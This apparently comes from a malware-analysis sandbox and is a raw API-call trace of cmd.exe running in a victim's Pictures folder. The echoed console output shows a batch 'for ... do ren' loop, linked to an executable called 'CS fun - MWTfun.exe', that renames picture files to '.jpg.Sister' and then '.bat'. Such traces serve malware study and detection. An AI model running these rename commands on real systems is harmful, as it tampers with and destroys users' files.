_wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.310] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.310] ??_V@YAXPEAX@Z () returned 0x1 [0293.310] GetProcessHeap () returned 0x21ed8c70000 [0293.310] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f980 [0293.310] GetProcessHeap () returned 0x21ed8c70000 [0293.310] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f980, Size=0x130) returned 0x21ed8d57d20 [0293.310] GetProcessHeap () returned 0x21ed8c70000 [0293.310] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d57d20) returned 0x130 [0293.310] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.310] malloc (_Size=0xffce) returned 0x21ed987fa80 [0293.310] ??_V@YAXPEAX@Z () returned 0x21ed987fa80 [0293.310] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.310] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed987fa80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0293.312] ??_V@YAXPEAX@Z () returned 0x1 [0293.312] GetProcessHeap () returned 0x21ed8c70000 [0293.312] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d57320 [0293.312] GetProcessHeap () returned 0x21ed8c70000 [0293.312] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f720 [0293.312] GetProcessHeap () returned 0x21ed8c70000 [0293.312] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f720, Size=0x130) returned 0x21ed8d57960 [0293.312] GetProcessHeap () returned 0x21ed8c70000 [0293.312] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d57960) returned 0x130 [0293.313] malloc (_Size=0xffce) returned 0x21ed987fa80 [0293.313] ??_V@YAXPEAX@Z () returned 0x21ed987fa80 [0293.313] GetProcessHeap () returned 0x21ed8c70000 [0293.313] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7d80 [0293.313] GetProcessHeap () returned 0x21ed8c70000 [0293.313] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5e100 [0293.313] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.313] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.313] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.313] GetLastError () returned 0x2 [0293.313] GetProcessHeap () returned 0x21ed8c70000 [0293.313] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92a0060 [0293.313] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92a0070 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.313] SetErrorMode (uMode=0x0) returned 0x0 [0293.314] SetErrorMode (uMode=0x1) returned 0x0 [0293.314] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed987fa80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0293.314] SetErrorMode (uMode=0x0) returned 0x1 [0293.314] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0293.314] GetProcessHeap () returned 0x21ed8c70000 [0293.314] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5a680 [0293.314] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.314] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.314] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.314] GetLastError () returned 0x2 [0293.314] ??_V@YAXPEAX@Z () returned 0x1 [0293.314] malloc (_Size=0xffce) returned 0x21ed987fa80 [0293.314] ??_V@YAXPEAX@Z () returned 0x21ed987fa80 [0293.314] malloc (_Size=0xffce) returned 0x21ed988fa60 [0293.315] ??_V@YAXPEAX@Z () returned 0x21ed988fa60 [0293.315] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.315] GetLastError () returned 0x2 [0293.315] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.315] GetFileType (hFile=0x54) returned 0x2 [0293.315] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0293.315] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0293.320] _get_osfhandle (_FileHandle=2) returned 0x54 [0293.320] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0293.320] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.320] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0293.320] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0293.327] longjmp () [0293.327] ??_V@YAXPEAX@Z () returned 0x1 [0293.328] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ccb9550, ftCreationTime.dwHighDateTime=0x1d5e61d, ftLastAccessTime.dwLowDateTime=0x90942140, ftLastAccessTime.dwHighDateTime=0x1d5e4b8, ftLastWriteTime.dwLowDateTime=0x90942140, ftLastWriteTime.dwHighDateTime=0x1d5e4b8, nFileSizeHigh=0x0, nFileSizeLow=0x6a01, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="hx6X83DtmMlRtgH7hUE7.jpg", cAlternateFileName="")) returned 1 [0293.328] GetProcessHeap () returned 0x21ed8c70000 [0293.328] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72790, Size=0x128) returned 0x21ed8c72790 [0293.328] GetProcessHeap () returned 0x21ed8c70000 [0293.328] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72790) returned 0x128 [0293.328] GetProcessHeap () returned 0x21ed8c70000 [0293.328] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92b0050 [0293.328] GetProcessHeap () returned 0x21ed8c70000 [0293.328] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92b0050, Size=0x30) returned 0x21ed92b0050 [0293.328] GetProcessHeap () returned 0x21ed8c70000 [0293.328] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92b0050) returned 0x30 [0293.328] GetProcessHeap () returned 0x21ed8c70000 [0293.328] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92b0090 [0293.329] malloc (_Size=0x1ff9c) returned 0x21ed989fa40 [0293.329] GetProcessHeap () returned 0x21ed8c70000 [0293.329] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7c070 [0293.329] ??_V@YAXPEAX@Z () returned 0x1 [0293.329] GetProcessHeap () returned 0x21ed8c70000 [0293.329] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92b0090, Size=0x200) returned 0x21ed92b0090 [0293.330] GetProcessHeap () returned 0x21ed8c70000 [0293.330] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92b0090) returned 0x200 [0293.330] GetProcessHeap () returned 0x21ed8c70000 [0293.330] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92b02a0 [0293.330] GetProcessHeap () returned 0x21ed8c70000 [0293.330] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92b02a0, Size=0x290) returned 0x21ed92b02a0 [0293.330] GetProcessHeap () returned 0x21ed8c70000 [0293.330] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92b02a0) returned 0x290 [0293.330] GetProcessHeap () returned 0x21ed8c70000 [0293.330] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92b0540 [0293.330] GetProcessHeap () returned 0x21ed8c70000 [0293.330] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92b0540, Size=0x30) returned 0x21ed92b0540 [0293.330] GetProcessHeap () returned 0x21ed8c70000 [0293.330] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92b0540) returned 0x30 [0293.330] GetProcessHeap () returned 0x21ed8c70000 [0293.330] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed92b0580 [0293.330] malloc (_Size=0x1ff9c) returned 0x21ed989fa40 [0293.330] GetProcessHeap () returned 0x21ed8c70000 [0293.330] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7c110 [0293.330] ??_V@YAXPEAX@Z () returned 0x1 [0293.331] malloc (_Size=0x1ff9c) returned 0x21ed989fa40 [0293.331] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc83e0 [0293.331] FindClose (in: hFindFile=0x21ed8cc83e0 | out: hFindFile=0x21ed8cc83e0) returned 1 [0293.331] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7cc0 [0293.331] FindClose (in: hFindFile=0x21ed8cc7cc0 | out: hFindFile=0x21ed8cc7cc0) returned 1 [0293.332] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd96a3bbf, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd96a3bbf, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8cc80e0 [0293.332] FindClose (in: hFindFile=0x21ed8cc80e0 | out: hFindFile=0x21ed8cc80e0) returned 1 [0293.333] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\hx6X83DtmMlRtgH7hUE7.jpg", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ccb9550, ftCreationTime.dwHighDateTime=0x1d5e61d, ftLastAccessTime.dwLowDateTime=0x90942140, ftLastAccessTime.dwHighDateTime=0x1d5e4b8, ftLastWriteTime.dwLowDateTime=0x90942140, ftLastWriteTime.dwHighDateTime=0x1d5e4b8, nFileSizeHigh=0x0, nFileSizeLow=0x6a01, dwReserved0=0x4, dwReserved1=0x7, cFileName="hx6X83DtmMlRtgH7hUE7.jpg", cAlternateFileName="HX6X83~1.JPG")) returned 0x21ed8cc8440 [0293.333] FindClose (in: hFindFile=0x21ed8cc8440 | out: hFindFile=0x21ed8cc8440) returned 1 [0293.333] _wcsnicmp (_String1="HX6X83~1.JPG", _String2="hx6X83DtmMlRtgH7hUE7.jpg", _MaxCount=0x18) returned 26 [0293.333] malloc (_Size=0x1ff9c) returned 0x21ed98bf9f0 [0293.334] ??_V@YAXPEAX@Z () returned 0x21ed98bf9f0 [0293.335] GetProcessHeap () returned 0x21ed8c70000 [0293.335] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bd50 [0293.335] ??_V@YAXPEAX@Z () returned 0x1 [0293.335] ??_V@YAXPEAX@Z () returned 0x1 [0293.335] GetProcessHeap () returned 0x21ed8c70000 [0293.335] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92b0580, Size=0x200) returned 0x21ed92b0580 [0293.335] GetProcessHeap () returned 0x21ed8c70000 [0293.335] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92b0580) returned 0x200 [0293.335] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0293.335] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.335] GetFileType (hFile=0x50) returned 0x2 [0293.335] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.336] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0293.336] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.336] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0293.416] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.416] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.416] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0293.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.416] GetFileType (hFile=0x50) returned 0x2 [0293.417] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.417] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0293.417] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.417] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0293.418] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.418] GetFileType (hFile=0x50) returned 0x2 [0293.418] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.418] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.418] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.418] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed92b0060*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed92b0060*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.419] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"hx6X83DtmMlRtgH7hUE7.jpg\" \"hx6X83DtmMlRtgH7hUE7.jpg.Sister\" ") returned 62 [0293.419] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.419] GetFileType (hFile=0x50) returned 0x2 [0293.419] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.419] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.420] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.420] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3e) returned 1 [0293.420] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0293.420] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.420] GetFileType (hFile=0x50) returned 0x2 [0293.420] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.420] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.421] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.421] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0293.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.422] GetFileType (hFile=0x50) returned 0x2 [0293.422] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.422] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.422] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0293.423] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0293.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.423] GetFileType (hFile=0x50) returned 0x2 [0293.423] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.423] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.423] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0293.425] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0293.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.425] GetFileType (hFile=0x50) returned 0x2 [0293.425] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.425] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.426] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0293.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.431] GetFileType (hFile=0x50) returned 0x2 [0293.431] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.431] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.431] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed92b0550*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed92b0550*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.432] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"hx6X83DtmMlRtgH7hUE7.jpg.Sister\" \"hx6X83DtmMlRtgH7hUE7.bat\" ") returned 62 [0293.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.432] GetFileType (hFile=0x50) returned 0x2 [0293.432] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.432] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.432] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3e) returned 1 [0293.439] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0293.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.439] GetFileType (hFile=0x50) returned 0x2 [0293.439] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.439] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0293.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.440] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0293.445] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.446] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.446] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.446] malloc (_Size=0xffce) returned 0x21ed989fa40 [0293.446] ??_V@YAXPEAX@Z () returned 0x21ed989fa40 [0293.446] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.446] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.446] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.446] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.446] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.446] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.446] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.446] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.446] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.446] ??_V@YAXPEAX@Z () returned 0x1 [0293.446] GetProcessHeap () returned 0x21ed8c70000 [0293.446] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed8d6ae90 [0293.447] GetProcessHeap () returned 0x21ed8c70000 [0293.447] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6ae90, Size=0x8c) returned 0x21ed8d6ae90 [0293.447] GetProcessHeap () returned 0x21ed8c70000 [0293.447] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6ae90) returned 0x8c [0293.450] GetProcessHeap () returned 0x21ed8c70000 [0293.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x94) returned 0x21ed8d65d90 [0293.450] GetProcessHeap () returned 0x21ed8c70000 [0293.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed8d6af30 [0293.450] GetProcessHeap () returned 0x21ed8c70000 [0293.450] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6af30, Size=0x8c) returned 0x21ed8d6af30 [0293.450] GetProcessHeap () returned 0x21ed8c70000 [0293.450] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6af30) returned 0x8c [0293.450] malloc (_Size=0xffce) returned 0x21ed989fa40 [0293.450] ??_V@YAXPEAX@Z () returned 0x21ed989fa40 [0293.450] GetProcessHeap () returned 0x21ed8c70000 [0293.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7f00 [0293.450] GetProcessHeap () returned 0x21ed8c70000 [0293.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5b520 [0293.450] _wcsicmp (_String1="hx6X83DtmMlRtgH7hUE7.jpg", _String2=".") returned 58 [0293.450] _wcsicmp (_String1="hx6X83DtmMlRtgH7hUE7.jpg", _String2="..") returned 58 [0293.451] GetFileAttributesW 